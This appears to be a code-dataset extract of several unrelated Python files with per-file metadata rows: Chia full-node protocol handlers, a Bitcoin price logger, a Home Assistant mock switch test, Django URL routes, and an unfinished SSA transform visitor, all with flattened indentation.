for item in items:
transaction = full_node_protocol.RespondTransaction(item.spend_bundle)
msg = make_msg(ProtocolMessageTypes.respond_transaction, transaction)
await peer.send_message(msg)
return None
# FARMER PROTOCOL
@api_request
@peer_required
async def declare_proof_of_space(
self, request: farmer_protocol.DeclareProofOfSpace, peer: ws.WSChiaConnection
) -> Optional[Message]:
"""
Creates a block body and header, with the proof of space, coinbase, and fee targets provided
by the farmer, and sends the hash of the header data back to the farmer.
"""
if self.full_node.sync_store.get_sync_mode():
return None
async with self.full_node.timelord_lock:
sp_vdfs: Optional[SignagePoint] = self.full_node.full_node_store.get_signage_point(
request.challenge_chain_sp
)
if sp_vdfs is None:
self.log.warning(f"Received proof of space for an unknown signage point {request.challenge_chain_sp}")
return None
if request.signage_point_index > 0:
assert sp_vdfs.rc_vdf is not None
if sp_vdfs.rc_vdf.output.get_hash() != request.reward_chain_sp:
self.log.debug(
f"Received proof of space for a potentially old signage point {request.challenge_chain_sp}. "
f"Current sp: {sp_vdfs.rc_vdf.output.get_hash()}"
)
return None
if request.signage_point_index == 0:
cc_challenge_hash: bytes32 = request.challenge_chain_sp
else:
assert sp_vdfs.cc_vdf is not None
cc_challenge_hash = sp_vdfs.cc_vdf.challenge
pos_sub_slot: Optional[Tuple[EndOfSubSlotBundle, int, uint128]] = None
if request.challenge_hash != self.full_node.constants.GENESIS_CHALLENGE:
# Checks that the proof of space is a response to a recent challenge and valid SP
pos_sub_slot = self.full_node.full_node_store.get_sub_slot(cc_challenge_hash)
if pos_sub_slot is None:
self.log.warning(f"Received proof of space for an unknown sub slot: {request}")
return None
total_iters_pos_slot: uint128 = pos_sub_slot[2]
else:
total_iters_pos_slot = uint128(0)
assert cc_challenge_hash == request.challenge_hash
# Now we know that the proof of space has a signage point either:
# 1. In the previous sub-slot of the peak (overflow)
# 2. In the same sub-slot as the peak
# 3. In a future sub-slot that we already know of
# Checks that the proof of space is valid
quality_string: Optional[bytes32] = request.proof_of_space.verify_and_get_quality_string(
self.full_node.constants, cc_challenge_hash, request.challenge_chain_sp
)
assert quality_string is not None and len(quality_string) == 32
# Grab best transactions from Mempool for given tip target
aggregate_signature: G2Element = G2Element()
block_generator: Optional[BlockGenerator] = None
additions: Optional[List[Coin]] = []
removals: Optional[List[Coin]] = []
async with self.full_node._blockchain_lock_high_priority:
peak: Optional[BlockRecord] = self.full_node.blockchain.get_peak()
if peak is not None:
# Finds the last transaction block before this one
curr_l_tb: BlockRecord = peak
while not curr_l_tb.is_transaction_block:
curr_l_tb = self.full_node.blockchain.block_record(curr_l_tb.prev_hash)
try:
mempool_bundle = await self.full_node.mempool_manager.create_bundle_from_mempool(
curr_l_tb.header_hash
)
except Exception as e:
self.log.error(f"Traceback: {traceback.format_exc()}")
self.full_node.log.error(f"Error making spend bundle {e} peak: {peak}")
mempool_bundle = None
if mempool_bundle is not None:
spend_bundle = mempool_bundle[0]
additions = mempool_bundle[1]
removals = mempool_bundle[2]
self.full_node.log.info(f"Add rem: {len(additions)} {len(removals)}")
aggregate_signature = spend_bundle.aggregated_signature
if self.full_node.full_node_store.previous_generator is not None:
self.log.info(
f"Using previous generator for height "
f"{self.full_node.full_node_store.previous_generator}"
)
block_generator = best_solution_generator_from_template(
self.full_node.full_node_store.previous_generator, spend_bundle
)
else:
block_generator = simple_solution_generator(spend_bundle)
def get_plot_sig(to_sign, _) -> G2Element:
if to_sign == request.challenge_chain_sp:
return request.challenge_chain_sp_signature
elif to_sign == request.reward_chain_sp:
return request.reward_chain_sp_signature
return G2Element()
def get_pool_sig(_1, _2) -> Optional[G2Element]:
return request.pool_signature
prev_b: Optional[BlockRecord] = self.full_node.blockchain.get_peak()
# Finds the previous block from the signage point, ensuring that the reward chain VDF is correct
if prev_b is not None:
if request.signage_point_index == 0:
if pos_sub_slot is None:
self.log.warning("Pos sub slot is None")
return None
rc_challenge = pos_sub_slot[0].reward_chain.end_of_slot_vdf.challenge
else:
assert sp_vdfs.rc_vdf is not None
rc_challenge = sp_vdfs.rc_vdf.challenge
# Backtrack through empty sub-slots
for eos, _, _ in reversed(self.full_node.full_node_store.finished_sub_slots):
if eos is not None and eos.reward_chain.get_hash() == rc_challenge:
rc_challenge = eos.reward_chain.end_of_slot_vdf.challenge
found = False
attempts = 0
while prev_b is not None and attempts < 10:
if prev_b.reward_infusion_new_challenge == rc_challenge:
found = True
break
if prev_b.finished_reward_slot_hashes is not None and len(prev_b.finished_reward_slot_hashes) > 0:
if prev_b.finished_reward_slot_hashes[-1] == rc_challenge:
# This block includes a sub-slot which is where our SP vdf starts. Go back one more
# to find the prev block
prev_b = self.full_node.blockchain.try_block_record(prev_b.prev_hash)
found = True
break
prev_b = self.full_node.blockchain.try_block_record(prev_b.prev_hash)
attempts += 1
if not found:
self.log.warning("Did not find a previous block with the correct reward chain hash")
return None
try:
finished_sub_slots: Optional[
List[EndOfSubSlotBundle]
] = self.full_node.full_node_store.get_finished_sub_slots(
self.full_node.blockchain, prev_b, cc_challenge_hash
)
if finished_sub_slots is None:
return None
if (
len(finished_sub_slots) > 0
and pos_sub_slot is not None
and finished_sub_slots[-1] != pos_sub_slot[0]
):
self.log.error("Have different sub-slots than is required to farm this block")
return None
except ValueError as e:
self.log.warning(f"Value Error: {e}")
return None
if prev_b is None:
pool_target = PoolTarget(
self.full_node.constants.GENESIS_PRE_FARM_POOL_PUZZLE_HASH,
uint32(0),
)
farmer_ph = self.full_node.constants.GENESIS_PRE_FARM_FARMER_PUZZLE_HASH
else:
farmer_ph = request.farmer_puzzle_hash
if request.proof_of_space.pool_contract_puzzle_hash is not None:
pool_target = PoolTarget(request.proof_of_space.pool_contract_puzzle_hash, uint32(0))
else:
assert request.pool_target is not None
pool_target = request.pool_target
if peak is None or peak.height <= self.full_node.constants.MAX_SUB_SLOT_BLOCKS:
difficulty = self.full_node.constants.DIFFICULTY_STARTING
sub_slot_iters = self.full_node.constants.SUB_SLOT_ITERS_STARTING
else:
difficulty = uint64(peak.weight - self.full_node.blockchain.block_record(peak.prev_hash).weight)
sub_slot_iters = peak.sub_slot_iters
for sub_slot in finished_sub_slots:
if sub_slot.challenge_chain.new_difficulty is not None:
difficulty = sub_slot.challenge_chain.new_difficulty
if sub_slot.challenge_chain.new_sub_slot_iters is not None:
sub_slot_iters = sub_slot.challenge_chain.new_sub_slot_iters
required_iters: uint64 = calculate_iterations_quality(
self.full_node.constants.DIFFICULTY_CONSTANT_FACTOR,
quality_string,
request.proof_of_space.size,
difficulty,
request.challenge_chain_sp,
)
sp_iters: uint64 = calculate_sp_iters(self.full_node.constants, sub_slot_iters, request.signage_point_index)
ip_iters: uint64 = calculate_ip_iters(
self.full_node.constants,
sub_slot_iters,
request.signage_point_index,
required_iters,
)
# The block's timestamp must be greater than the previous transaction block's timestamp
timestamp = uint64(int(time.time()))
curr: Optional[BlockRecord] = prev_b
while curr is not None and not curr.is_transaction_block and curr.height != 0:
curr = self.full_node.blockchain.try_block_record(curr.prev_hash)
if curr is not None:
assert curr.timestamp is not None
if timestamp <= curr.timestamp:
timestamp = uint64(int(curr.timestamp + 1))
self.log.info("Starting to make the unfinished block")
unfinished_block: UnfinishedBlock = create_unfinished_block(
self.full_node.constants,
total_iters_pos_slot,
sub_slot_iters,
request.signage_point_index,
sp_iters,
ip_iters,
request.proof_of_space,
cc_challenge_hash,
farmer_ph,
pool_target,
get_plot_sig,
get_pool_sig,
sp_vdfs,
timestamp,
self.full_node.blockchain,
b"",
block_generator,
aggregate_signature,
additions,
removals,
prev_b,
finished_sub_slots,
)
self.log.info("Made the unfinished block")
if prev_b is not None:
height: uint32 = uint32(prev_b.height + 1)
else:
height = uint32(0)
self.full_node.full_node_store.add_candidate_block(quality_string, height, unfinished_block)
foliage_sb_data_hash = unfinished_block.foliage.foliage_block_data.get_hash()
if unfinished_block.is_transaction_block():
foliage_transaction_block_hash = unfinished_block.foliage.foliage_transaction_block_hash
else:
foliage_transaction_block_hash = bytes32([0] * 32)
assert foliage_transaction_block_hash is not None
message = farmer_protocol.RequestSignedValues(
quality_string,
foliage_sb_data_hash,
foliage_transaction_block_hash,
)
await peer.send_message(make_msg(ProtocolMessageTypes.request_signed_values, message))
# Adds backup in case the first one fails
if unfinished_block.is_transaction_block() and unfinished_block.transactions_generator is not None:
unfinished_block_backup = create_unfinished_block(
self.full_node.constants,
total_iters_pos_slot,
sub_slot_iters,
request.signage_point_index,
sp_iters,
ip_iters,
request.proof_of_space,
cc_challenge_hash,
farmer_ph,
pool_target,
get_plot_sig,
get_pool_sig,
sp_vdfs,
timestamp,
self.full_node.blockchain,
b"",
None,
G2Element(),
None,
None,
prev_b,
finished_sub_slots,
)
self.full_node.full_node_store.add_candidate_block(
quality_string, height, unfinished_block_backup, backup=True
)
return None
@api_request
@peer_required
async def signed_values(
self, farmer_request: farmer_protocol.SignedValues, peer: ws.WSChiaConnection
) -> Optional[Message]:
"""
Signature of header hash, by the harvester. This is enough to create an unfinished
block, which only needs a Proof of Time to be finished. If the signature is valid,
we call the unfinished_block routine.
"""
candidate_tuple: Optional[Tuple[uint32, UnfinishedBlock]] = self.full_node.full_node_store.get_candidate_block(
farmer_request.quality_string
)
if candidate_tuple is None:
self.log.warning(f"Quality string {farmer_request.quality_string} not found in database")
return None
height, candidate = candidate_tuple
if not AugSchemeMPL.verify(
candidate.reward_chain_block.proof_of_space.plot_public_key,
candidate.foliage.foliage_block_data.get_hash(),
farmer_request.foliage_block_data_signature,
):
self.log.warning("Signature not valid. There might be a collision in plots. Ignore this during tests.")
return None
fsb2 = dataclasses.replace(
candidate.foliage,
foliage_block_data_signature=farmer_request.foliage_block_data_signature,
)
if candidate.is_transaction_block():
fsb2 = dataclasses.replace(
fsb2, foliage_transaction_block_signature=farmer_request.foliage_transaction_block_signature
)
new_candidate = dataclasses.replace(candidate, foliage=fsb2)
if not self.full_node.has_valid_pool_sig(new_candidate):
self.log.warning("Trying to make a pre-farm block but height is not 0")
return None
# Propagate to ourselves (which validates and does further propagations)
request = full_node_protocol.RespondUnfinishedBlock(new_candidate)
try:
await self.full_node.respond_unfinished_block(request, None, True)
except Exception as e:
# If we have an error with this block, try making an empty block
self.full_node.log.error(f"Error farming block {e} {request}")
candidate_tuple = self.full_node.full_node_store.get_candidate_block(
farmer_request.quality_string, backup=True
)
if candidate_tuple is not None:
height, unfinished_block = candidate_tuple
self.full_node.full_node_store.add_candidate_block(
farmer_request.quality_string, height, unfinished_block, False
)
# All unfinished blocks that we create will have the foliage transaction block and hash
assert unfinished_block.foliage.foliage_transaction_block_hash is not None
message = farmer_protocol.RequestSignedValues(
farmer_request.quality_string,
unfinished_block.foliage.foliage_block_data.get_hash(),
unfinished_block.foliage.foliage_transaction_block_hash,
)
await peer.send_message(make_msg(ProtocolMessageTypes.request_signed_values, message))
return None
# TIMELORD PROTOCOL
@peer_required
@api_request
async def new_infusion_point_vdf(
self, request: timelord_protocol.NewInfusionPointVDF, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
# Lookup unfinished blocks
async with self.full_node.timelord_lock:
return await self.full_node.new_infusion_point_vdf(request, peer)
@peer_required
@api_request
async def new_signage_point_vdf(
self, request: timelord_protocol.NewSignagePointVDF, peer: ws.WSChiaConnection
) -> None:
if self.full_node.sync_store.get_sync_mode():
return None
full_node_message = full_node_protocol.RespondSignagePoint(
request.index_from_challenge,
request.challenge_chain_sp_vdf,
request.challenge_chain_sp_proof,
request.reward_chain_sp_vdf,
request.reward_chain_sp_proof,
)
await self.respond_signage_point(full_node_message, peer)
@peer_required
@api_request
async def new_end_of_sub_slot_vdf(
self, request: timelord_protocol.NewEndOfSubSlotVDF, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
if (
self.full_node.full_node_store.get_sub_slot(request.end_of_sub_slot_bundle.challenge_chain.get_hash())
is not None
):
return None
# Calls our own internal message to handle the end of sub slot, and potentially broadcasts to other peers.
full_node_message = full_node_protocol.RespondEndOfSubSlot(request.end_of_sub_slot_bundle)
msg, added = await self.full_node.respond_end_of_sub_slot(full_node_message, peer)
if not added:
self.log.error(
f"Was not able to add end of sub-slot: "
f"{request.end_of_sub_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge}. "
f"Re-sending new-peak to timelord"
)
await self.full_node.send_peak_to_timelords(peer=peer)
return None
else:
return msg
@api_request
async def request_block_header(self, request: wallet_protocol.RequestBlockHeader) -> Optional[Message]:
header_hash = self.full_node.blockchain.height_to_hash(request.height)
if header_hash is None:
msg = make_msg(ProtocolMessageTypes.reject_header_request, RejectHeaderRequest(request.height))
return msg
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
if block is not None:
tx_removals, tx_additions, _ = await self.full_node.blockchain.get_tx_removals_and_additions(block)
header_block = get_block_header(block, tx_additions, tx_removals)
msg = make_msg(
ProtocolMessageTypes.respond_block_header,
wallet_protocol.RespondBlockHeader(header_block),
)
return msg
return None
@api_request
async def request_additions(self, request: wallet_protocol.RequestAdditions) -> Optional[Message]:
if request.header_hash is None:
header_hash: Optional[bytes32] = self.full_node.blockchain.height_to_hash(request.height)
else:
header_hash = request.header_hash
if header_hash is None:
raise ValueError(f"Block at height {request.height} not found")
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
# We lock so that the coin store does not get modified
if (
block is None
or block.is_transaction_block() is False
or self.full_node.blockchain.height_to_hash(block.height) != request.header_hash
):
reject = wallet_protocol.RejectAdditionsRequest(request.height, header_hash)
msg = make_msg(ProtocolMessageTypes.reject_additions_request, reject)
return msg
assert block is not None and block.foliage_transaction_block is not None
# Note: this might return bad data if there is a reorg in this time
additions = await self.full_node.coin_store.get_coins_added_at_height(block.height)
if self.full_node.blockchain.height_to_hash(block.height) != request.header_hash:
raise ValueError(f"Block {block.header_hash} no longer in chain")
puzzlehash_coins_map: Dict[bytes32, List[Coin]] = {}
for coin_record in additions:
if coin_record.coin.puzzle_hash in puzzlehash_coins_map:
puzzlehash_coins_map[coin_record.coin.puzzle_hash].append(coin_record.coin)
else:
puzzlehash_coins_map[coin_record.coin.puzzle_hash] = [coin_record.coin]
coins_map: List[Tuple[bytes32, List[Coin]]] = []
proofs_map: List[Tuple[bytes32, bytes, Optional[bytes]]] = []
if request.puzzle_hashes is None:
for puzzle_hash, coins in puzzlehash_coins_map.items():
coins_map.append((puzzle_hash, coins))
response = wallet_protocol.RespondAdditions(block.height, block.header_hash, coins_map, None)
else:
# Create addition Merkle set
addition_merkle_set = MerkleSet()
# Addition Merkle set contains puzzlehash and hash of all coins with that puzzlehash
for puzzle, coins in puzzlehash_coins_map.items():
addition_merkle_set.add_already_hashed(puzzle)
addition_merkle_set.add_already_hashed(hash_coin_list(coins))
assert addition_merkle_set.get_root() == block.foliage_transaction_block.additions_root
for puzzle_hash in request.puzzle_hashes:
result, proof = addition_merkle_set.is_included_already_hashed(puzzle_hash)
if puzzle_hash in puzzlehash_coins_map:
coins_map.append((puzzle_hash, puzzlehash_coins_map[puzzle_hash]))
hash_coin_str = hash_coin_list(puzzlehash_coins_map[puzzle_hash])
result_2, proof_2 = addition_merkle_set.is_included_already_hashed(hash_coin_str)
assert result
assert result_2
proofs_map.append((puzzle_hash, proof, proof_2))
else:
coins_map.append((puzzle_hash, []))
assert not result
proofs_map.append((puzzle_hash, proof, None))
response = wallet_protocol.RespondAdditions(block.height, block.header_hash, coins_map, proofs_map)
msg = make_msg(ProtocolMessageTypes.respond_additions, response)
return msg
@api_request
async def request_removals(self, request: wallet_protocol.RequestRemovals) -> Optional[Message]:
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(request.header_hash)
# We lock so that the coin store does not get modified
peak_height = self.full_node.blockchain.get_peak_height()
if (
block is None
or block.is_transaction_block() is False
or block.height != request.height
or (peak_height is not None and block.height > peak_height)
or self.full_node.blockchain.height_to_hash(block.height) != request.header_hash
):
reject = wallet_protocol.RejectRemovalsRequest(request.height, request.header_hash)
msg = make_msg(ProtocolMessageTypes.reject_removals_request, reject)
return msg
assert block is not None and block.foliage_transaction_block is not None
# Note: this might return bad data if there is a reorg in this time
all_removals: List[CoinRecord] = await self.full_node.coin_store.get_coins_removed_at_height(block.height)
if self.full_node.blockchain.height_to_hash(block.height) != request.header_hash:
raise ValueError(f"Block {block.header_hash} no longer in chain")
all_removals_dict: Dict[bytes32, Coin] = {}
for coin_record in all_removals:
all_removals_dict[coin_record.coin.name()] = coin_record.coin
coins_map: List[Tuple[bytes32, Optional[Coin]]] = []
proofs_map: List[Tuple[bytes32, bytes]] = []
# If there are no transactions, respond with empty lists
if block.transactions_generator is None:
proofs: Optional[List]
if request.coin_names is None:
proofs = None
else:
proofs = []
response = wallet_protocol.RespondRemovals(block.height, block.header_hash, [], proofs)
elif request.coin_names is None or len(request.coin_names) == 0:
for removed_name, removed_coin in all_removals_dict.items():
coins_map.append((removed_name, removed_coin))
response = wallet_protocol.RespondRemovals(block.height, block.header_hash, coins_map, None)
else:
assert block.transactions_generator
removal_merkle_set = MerkleSet()
for removed_name, removed_coin in all_removals_dict.items():
removal_merkle_set.add_already_hashed(removed_name)
assert removal_merkle_set.get_root() == block.foliage_transaction_block.removals_root
for coin_name in request.coin_names:
result, proof = removal_merkle_set.is_included_already_hashed(coin_name)
proofs_map.append((coin_name, proof))
if coin_name in all_removals_dict:
removed_coin = all_removals_dict[coin_name]
coins_map.append((coin_name, removed_coin))
assert result
else:
coins_map.append((coin_name, None))
assert not result
response = wallet_protocol.RespondRemovals(block.height, block.header_hash, coins_map, proofs_map)
msg = make_msg(ProtocolMessageTypes.respond_removals, response)
return msg
@api_request
async def send_transaction(self, request: wallet_protocol.SendTransaction, *, test=False) -> Optional[Message]:
spend_name = request.transaction.name()
await self.full_node.transaction_queue.put(
(0, TransactionQueueEntry(request.transaction, None, spend_name, None, test))
)
# Waits for the transaction to go into the mempool, times out after 45 seconds.
status, error = None, None
sleep_time = 0.01
for i in range(int(45 / sleep_time)):
await asyncio.sleep(sleep_time)
for potential_name, potential_status, potential_error in self.full_node.transaction_responses:
if spend_name == potential_name:
status = potential_status
error = potential_error
break
if status is not None:
break
if status is None:
response = wallet_protocol.TransactionAck(spend_name, uint8(MempoolInclusionStatus.PENDING), None)
else:
error_name = error.name if error is not None else None
if status == MempoolInclusionStatus.SUCCESS:
response = wallet_protocol.TransactionAck(spend_name, uint8(status.value), error_name)
else:
# If if failed/pending, but it previously succeeded (in mempool), this is idempotence, return SUCCESS
if self.full_node.mempool_manager.get_spendbundle(spend_name) is not None:
response = wallet_protocol.TransactionAck(
spend_name, uint8(MempoolInclusionStatus.SUCCESS.value), None
)
else:
response = wallet_protocol.TransactionAck(spend_name, uint8(status.value), error_name)
msg = make_msg(ProtocolMessageTypes.transaction_ack, response)
return msg
@api_request
async def request_puzzle_solution(self, request: wallet_protocol.RequestPuzzleSolution) -> Optional[Message]:
coin_name = request.coin_name
height = request.height
coin_record = await self.full_node.coin_store.get_coin_record(coin_name)
reject = wallet_protocol.RejectPuzzleSolution(coin_name, height)
reject_msg = make_msg(ProtocolMessageTypes.reject_puzzle_solution, reject)
if coin_record is None or coin_record.spent_block_index != height:
return reject_msg
header_hash: Optional[bytes32] = self.full_node.blockchain.height_to_hash(height)
if header_hash is None:
return reject_msg
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
if block is None or block.transactions_generator is None:
return reject_msg
block_generator: Optional[BlockGenerator] = await self.full_node.blockchain.get_block_generator(block)
assert block_generator is not None
error, puzzle, solution = get_puzzle_and_solution_for_coin(
block_generator, coin_name, self.full_node.constants.MAX_BLOCK_COST_CLVM
)
if error is not None:
return reject_msg
pz = Program.to(puzzle)
sol = Program.to(solution)
wrapper = PuzzleSolutionResponse(coin_name, height, pz, sol)
response = wallet_protocol.RespondPuzzleSolution(wrapper)
response_msg = make_msg(ProtocolMessageTypes.respond_puzzle_solution, response)
return response_msg
@api_request
async def request_header_blocks(self, request: wallet_protocol.RequestHeaderBlocks) -> Optional[Message]:
if request.end_height < request.start_height or request.end_height - request.start_height > 32:
return None
header_hashes: List[bytes32] = []
for i in range(request.start_height, request.end_height + 1):
header_hash: Optional[bytes32] = self.full_node.blockchain.height_to_hash(uint32(i))
if header_hash is None:
reject = RejectHeaderBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_header_blocks, reject)
return msg
header_hashes.append(header_hash)
blocks: List[FullBlock] = await self.full_node.block_store.get_blocks_by_hash(header_hashes)
header_blocks = []
for block in blocks:
added_coins_records = await self.full_node.coin_store.get_coins_added_at_height(block.height)
removed_coins_records = await self.full_node.coin_store.get_coins_removed_at_height(block.height)
added_coins = [record.coin for record in added_coins_records if not record.coinbase]
removal_names = [record.coin.name() for record in removed_coins_records]
header_block = get_block_header(block, added_coins, removal_names)
header_blocks.append(header_block)
msg = make_msg(
ProtocolMessageTypes.respond_header_blocks,
wallet_protocol.RespondHeaderBlocks(request.start_height, request.end_height, header_blocks),
)
return msg
@api_request
async def respond_compact_proof_of_time(self, request: timelord_protocol.RespondCompactProofOfTime):
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.respond_compact_proof_of_time(request)
@execute_task
@peer_required
@api_request
@bytes_required
async def new_compact_vdf(
self, request: full_node_protocol.NewCompactVDF, peer: ws.WSChiaConnection, request_bytes: bytes = b""
):
if self.full_node.sync_store.get_sync_mode():
return None
if len(self.full_node.compact_vdf_sem._waiters) > 20:
self.log.debug(f"Ignoring NewCompactVDF: {request}, _waiters")
return
name = std_hash(request_bytes)
if name in self.full_node.compact_vdf_requests:
self.log.debug(f"Ignoring NewCompactVDF: {request}, already requested")
return
self.full_node.compact_vdf_requests.add(name)
# this semaphore will only allow a limited number of tasks call
# new_compact_vdf() at a time, since it can be expensive
async with self.full_node.compact_vdf_sem:
try:
await self.full_node.new_compact_vdf(request, peer)
finally:
self.full_node.compact_vdf_requests.remove(name)
@peer_required
@api_request
@reply_type([ProtocolMessageTypes.respond_compact_vdf])
async def request_compact_vdf(self, request: full_node_protocol.RequestCompactVDF, peer: ws.WSChiaConnection):
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.request_compact_vdf(request, peer)
@peer_required
@api_request
async def respond_compact_vdf(self, request: full_node_protocol.RespondCompactVDF, peer: ws.WSChiaConnection):
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.respond_compact_vdf(request, peer)
@peer_required
@api_request
async def register_interest_in_puzzle_hash(
self, request: wallet_protocol.RegisterForPhUpdates, peer: ws.WSChiaConnection
):
if peer.peer_node_id not in self.full_node.peer_puzzle_hash:
self.full_node.peer_puzzle_hash[peer.peer_node_id] = set()
if peer.peer_node_id not in self.full_node.peer_sub_counter:
self.full_node.peer_sub_counter[peer.peer_node_id] = 0
hint_coin_ids = []
# Add peer to the "Subscribed" dictionary
max_items = self.full_node.config.get("max_subscribe_items", 200000)
for puzzle_hash in request.puzzle_hashes:
ph_hint_coins = await self.full_node.hint_store.get_coin_ids(puzzle_hash)
hint_coin_ids.extend(ph_hint_coins)
if puzzle_hash not in self.full_node.ph_subscriptions:
self.full_node.ph_subscriptions[puzzle_hash] = set()
if (
peer.peer_node_id not in self.full_node.ph_subscriptions[puzzle_hash]
and self.full_node.peer_sub_counter[peer.peer_node_id] < max_items
):
self.full_node.ph_subscriptions[puzzle_hash].add(peer.peer_node_id)
self.full_node.peer_puzzle_hash[peer.peer_node_id].add(puzzle_hash)
self.full_node.peer_sub_counter[peer.peer_node_id] += 1
# Send all coins with requested puzzle hash that have been created after the specified height
states: List[CoinState] = await self.full_node.coin_store.get_coin_states_by_puzzle_hashes(
include_spent_coins=True, puzzle_hashes=request.puzzle_hashes, min_height=request.min_height
)
if len(hint_coin_ids) > 0:
hint_states = await self.full_node.coin_store.get_coin_states_by_ids(
include_spent_coins=True, coin_ids=hint_coin_ids, min_height=request.min_height
)
states.extend(hint_states)
response = wallet_protocol.RespondToPhUpdates(request.puzzle_hashes, request.min_height, states)
msg = make_msg(ProtocolMessageTypes.respond_to_ph_update, response)
return msg
@peer_required
@api_request
async def register_interest_in_coin(
self, request: wallet_protocol.RegisterForCoinUpdates, peer: ws.WSChiaConnection
):
if peer.peer_node_id not in self.full_node.peer_coin_ids:
self.full_node.peer_coin_ids[peer.peer_node_id] = set()
if peer.peer_node_id not in self.full_node.peer_sub_counter:
self.full_node.peer_sub_counter[peer.peer_node_id] = 0
max_items = self.full_node.config.get("max_subscribe_items", 200000)
for coin_id in request.coin_ids:
if coin_id not in self.full_node.coin_subscriptions:
self.full_node.coin_subscriptions[coin_id] = set()
if (
peer.peer_node_id not in self.full_node.coin_subscriptions[coin_id]
and self.full_node.peer_sub_counter[peer.peer_node_id] < max_items
):
self.full_node.coin_subscriptions[coin_id].add(peer.peer_node_id)
self.full_node.peer_coin_ids[peer.peer_node_id].add(coin_id)
self.full_node.peer_sub_counter[peer.peer_node_id] += 1
states: List[CoinState] = await self.full_node.coin_store.get_coin_states_by_ids(
include_spent_coins=True, coin_ids=request.coin_ids, min_height=request.min_height
)
response = wallet_protocol.RespondToCoinUpdates(request.coin_ids, request.min_height, states)
msg = make_msg(ProtocolMessageTypes.respond_to_coin_update, response)
return msg
@api_request
async def request_children(self, request: wallet_protocol.RequestChildren) -> Optional[Message]:
coin_records: List[CoinRecord] = await self.full_node.coin_store.get_coin_records_by_parent_ids(
True, [request.coin_name]
)
states = [record.coin_state for record in coin_records]
response = wallet_protocol.RespondChildren(states)
msg = make_msg(ProtocolMessageTypes.respond_children, response)
return msg
@api_request
async def request_ses_hashes(self, request: wallet_protocol.RequestSESInfo):
"""Returns the start and end height of a sub-epoch for the height specified in request"""
ses_height = self.full_node.blockchain.get_ses_heights()
start_height = request.start_height
end_height = request.end_height
ses_hash_heights = []
ses_reward_hashes = []
for idx, ses_start_height in enumerate(ses_height):
if idx == len(ses_height) - 1:
break
next_ses_height = ses_height[idx + 1]
# start_ses_hash
if ses_start_height <= start_height < next_ses_height:
ses_hash_heights.append([ses_start_height, next_ses_height])
ses: SubEpochSummary = self.full_node.blockchain.get_ses(ses_start_height)
ses_reward_hashes.append(ses.reward_chain_hash)
if ses_start_height < end_height < next_ses_height:
break
else:
if idx == len(ses_height) - 2:
break
# else add extra ses as request start <-> end spans two ses
next_next_height = ses_height[idx + 2]
ses_hash_heights.append([next_ses_height, next_next_height])
nex_ses: SubEpochSummary = self.full_node.blockchain.get_ses(next_ses_height)
ses_reward_hashes.append(nex_ses.reward_chain_hash)
break
response = RespondSESInfo(ses_reward_hashes, ses_hash_heights)
msg = make_msg(ProtocolMessageTypes.respond_ses_hashes, response)
return msg
| 47.811796 | 120 | 0.645049 | [
"Apache-2.0"
] | AppleOfEnlightenment/chia-blockchain | chia/full_node/full_node_api.py | 72,148 | Python |
import requests, json
from time import sleep
from datetime import datetime
import sys
import traceback
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("outputfile", nargs='?', default="bitcoin_price.json")
parser.add_argument("errorfile", nargs='?', default="bitcoin_price_error.txt")
args = parser.parse_args()
def getBitcoinPrice():
URL = 'https://www.bitstamp.net/api/ticker/'
try:
r = requests.get(URL)
bitcoindata = json.loads(r.text)
bitcoindata['datetime'] = datetime.utcfromtimestamp(int(bitcoindata['timestamp'])).strftime('%Y-%m-%d-%H-%M-%S')
with open(args.outputfile, mode='a') as file:
file.write('{},\n'.format(json.dumps(bitcoindata)))
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
with open(args.errorfile, mode='a') as file:
traceback.print_exc(file=file)
file.write(('-'*100)+'\n\n')
while True:
getBitcoinPrice()
sleep(10) | 30.939394 | 128 | 0.644466 | [
"MIT"
] | OrhanAbuska/Bitcoin-Prediction-Master | get_bitcoin_new.py | 1,021 | Python |
"""
Provide a mock switch platform.
Call init before using it in your tests to ensure clean test data.
"""
from homeassistant.const import STATE_ON, STATE_OFF
from tests.common import MockToggleDevice
DEVICES = []
def init(empty=False):
"""Initialize the platform with devices."""
global DEVICES
DEVICES = [] if empty else [
MockToggleDevice('AC', STATE_ON),
MockToggleDevice('AC', STATE_OFF),
MockToggleDevice(None, STATE_OFF)
]
async def async_setup_platform(hass, config, async_add_devices_callback,
discovery_info=None):
"""Find and return test switches."""
async_add_devices_callback(DEVICES)
| 24.464286 | 72 | 0.686131 | [
"Apache-2.0"
] | DevRGT/home-assistant | tests/testing_config/custom_components/switch/test.py | 685 | Python |
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name="listings"),
path('<int:listing_id>', views.listing, name="listing"),
path('search', views.search, name="search")
]
| 22.2 | 60 | 0.662162 | [
"MIT"
] | toyerovsky/btre-project | listings/urls.py | 222 | Python |
#AST transform that puts programs in SSA form
import collections
from translate import *
class SSAVisitor(Visitor):
def __init__(self):
# Number of static assignments to that variable seen so far.
self.definition_counter = collections.defaultdict(int)
# Name of the live definition of each variable before a node.
self.prev_definition = collections.defaultdict(dict)
# Name of the last definition of each variable in a node.
self.last_definition = collections.defaultdict(dict)
# Node in SSA form.
self.ssa_node = {}
def format_name(self, name, definition_id):
return "{}_{}".format(name, definition_id)
def visit(self, node, is_leaving):
if isinstance(node, Node) and not is_leaving:
if node.kind == NT.IF:
self.prev_definition[node] = dict(self.definition_counter)
self.prev_definition[node.args[1]] = self.prev_definition[node]
if len(node.args) == 3:
self.prev_definition[node.args[2]] = self.prev_definition[node]
# The if branches have their prev_definition set by the parent,
# so they don't redefine it here.
elif node not in self.prev_definition:
self.prev_definition[node] = dict(self.definition_counter)
elif isinstance(node, Node) and is_leaving:
if node.kind == NT.IF:
then_stmts = self.ssa_node[node.args[1]].args
has_else = len(node.args) == 3
if has_else:
else_stmt = self.ssa_node[node.args[2]]
